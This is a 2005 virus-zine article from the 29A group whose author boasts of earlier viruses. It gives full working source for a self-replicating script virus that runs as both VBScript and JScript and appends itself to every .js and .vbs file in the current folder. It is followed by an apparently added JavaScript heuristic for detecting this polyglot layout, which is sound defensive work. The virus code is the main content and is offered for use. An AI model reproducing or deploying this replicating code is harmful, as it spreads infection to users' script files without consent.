Cross-scripting attacks

roy g biv / 29A

Former DOS/Win16 virus writer, author of several virus families, including Ginger (see Coderz #1 zine for terrible buggy example, contact me for better sources ;), and Virus Bulletin 9/95 for a description of what they called Rainbow. Co-author of world's first virus using circular partition trick (Orsam, coded with Prototype in 1993). Designer of world's first XMS swapping virus (John Galt, coded by RT Fishel in 1995, only 30 bytes stub, the rest is swapped out). Author of world's first virus using Thread Local Storage for replication (Shrug, see Virus Bulletin 6/02 for a description, but they call it Chiton), world's first virus using Visual Basic 5/6 language extensions for replication (OU812), world's first Native executable virus (Chthon), world's first virus using process co-operation to prevent termination (Gemini, see Virus Bulletin 9/02 for a description), world's first virus using polymorphic SMTP headers (JunkMail, see Virus Bulletin 11/02 for a description), world's first viruses that can convert any data files to infectable objects (Pretext), world's first 32/64-bit parasitic EPO .NET virus (Croissant, see Virus Bulletin 11/04 for a description, but they call it Impanate), world's first virus using self-executing HTML (JunkHTMaiL, see Virus Bulletin 7/03 for a description), world's first virus for Win64 on Intel Itanium (Shrug, see Virus Bulletin 6/04 for a description, but they call it Rugrat), world's first virus for Win64 on AMD AMD64 (Shrug), world's first cross-infecting virus for Intel IA32 and AMD AMD64 (Shrug), and world's first viruses that infect Office applications and script files using the same code (Macaroni). Author of various retrovirus articles (eg see Vlad #7 for the strings that make your code invisible to TBScan). Went to sleep for a number of years. This is my fourth virus for VBScript and JScript. They are the world's first viruses that can infect both VBS and JScript using the same code.

Question: VBScript or JScript?

I often wondered if it would be possible to create a single script that could run on both platforms, but until now I could not think of a way to identify the platform or to protect against compiling errors. It happens that there is an easy way to do both of these things, and I found it.

Answer: both

The way that I found is so simple that I am surprised at myself that I did not find it sooner. First, we use the fact that VBScript will treat the "rem" statement as a comment and skip the rest of the line, but JScript will treat it as a variable reference. Second, we use the fact that JScript supports block comments bounded by /* and */ and will ignore everything between them. That's it.

So VBScript starts with a "rem" comment, then becomes JScript code that begins by assigning a value to a variable called "rem", then the rest of the line is the rest of the JScript code. The line ends with the start of a block comment. The next line becomes the VBScript code which ends with another rem comment, which returns to JScript code, which ends the block comment.

Let's see the code. The JScript must be a single line after the "rem=1;" but is reformatted here.

    rem=1; /*ACDC - roy g biv 25/02/05*/
    a=new ActiveXObject("scripting.filesystemobject")
    b=a.opentextfile(WScript.scriptfullname).readall()
    b=b.substr(b.search(c=/rem=1/)) //remove everything before our code
    b=b.substr(0,b.lastIndexOf("*/")+2) //remove everything after our code
    for(d=new Enumerator(a.getfolder(".").files);!d.atEnd();d.moveNext()) //demo version, current directory only
    {
      f=a.getextensionname(e=d.item()).toLowerCase()
      if(f=="js"||f=="vbs")try
      {
        f=a.getfile(e)
        g=a.attributes
        f.attributes=0
        if(a.opentextfile(e).readall().search(c)<0)a.opentextfile(e,8).write("\n"+b) //append ourselves if not infected already
        f.attributes=g
      }
      catch(z)
      {
      }
    }
    /*

Next is VBScript code, which can also be a single line if reformatted.

    on error resume next
    set a=createobject("scripting.filesystemobject")
    b=a.opentextfile(wscript.scriptfullname).readall
    c="rem=1"
    b=mid(b,instr(b,c)) 'remove everything before our code
    b=left(b,instrrev(b,"*"+"/")+1) 'remove everything after our code
    set d=a.getfolder(".") 'demo version, current directory only
    for each e in d.files
    f=lcase(a.getextensionname(e))
    if f="js"or f="vbs"then
    f=a.attributes
    a.attributes=0
    if instr(a.opentextfile(e).readall,c)=0then a.opentextfile(e,8).write vbcrlf+b 'append ourselves if not infected already
    a.attributes=f
    end if
    next
    rem*/

Greets to friendly people (A-Z):

Active - Benny - Obleak - Prototype - Ratter - Ronin - RT Fishel - sars - The Gingerbread Man - Ultras - uNdErX - Vecna - VirusBuster - Whitehead

rgb/29A feb 2005
iam_rgb@hotmail.com
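
For analysts triaging .vbs and .js files: the layout this article describes (a line that begins with "rem=" and leaves a block comment open, followed by a VBScript "rem" comment whose text closes it) can be checked mechanically. The following is an added example, not code from the original article; the function names are hypothetical, the samples are constructed and inert, and the check is a heuristic that does not parse string literals.

```javascript
// Added example (not from the article). Names are hypothetical.
// Heuristic only: string literals and regex literals are not parsed.

// Drop block comments that open and close on the same line, so only a
// comment that is still open at end of line leaves a "/*" behind.
function stripClosedBlockComments(line) {
  return line.replace(/\/\*.*?\*\//g, "");
}

// Returns { polyglot, openLine, closeLine } with 1-based line numbers.
function findRemPolyglot(text) {
  const lines = text.split(/\r\n|\r|\n/);
  let openLine = null;
  for (let i = 0; i < lines.length; i++) {
    if (openLine === null) {
      // VBScript: comment line. JScript: assignment to a variable "rem".
      if (!/^\s*rem\s*=/i.test(lines[i])) continue;
      // JScript must leave a block comment open to hide the VBScript part.
      if (stripClosedBlockComments(lines[i]).includes("/*")) openLine = i + 1;
    } else if (/\brem\b.*\*\//i.test(lines[i])) {
      // VBScript "rem" comment whose text closes the JScript block comment.
      return { polyglot: true, openLine, closeLine: i + 1 };
    }
  }
  return { polyglot: false, openLine: null, closeLine: null };
}

// Constructed, inert samples.
const SAMPLE_POLYGLOT = [
  'rem=1; /* marker */ WScript.Echo("JScript branch"); /*',
  'wscript.echo "VBScript branch" : rem*/',
].join("\r\n");
const SAMPLE_PLAIN_VBS = 'rem ordinary comment\r\nwscript.echo "hello"';
const SAMPLE_PLAIN_JS = 'rem = 16; /* pixels per rem */\nvar px = 2 * rem;';

// Verdict string for a triage report.
function classify(text) {
  return findRemPolyglot(text).polyglot ? "rem-polyglot" : "clean";
}
```

Because the code described above appends itself to existing files, the scan walks every line rather than only the first, and a hit reports the line numbers where the open and close markers sit.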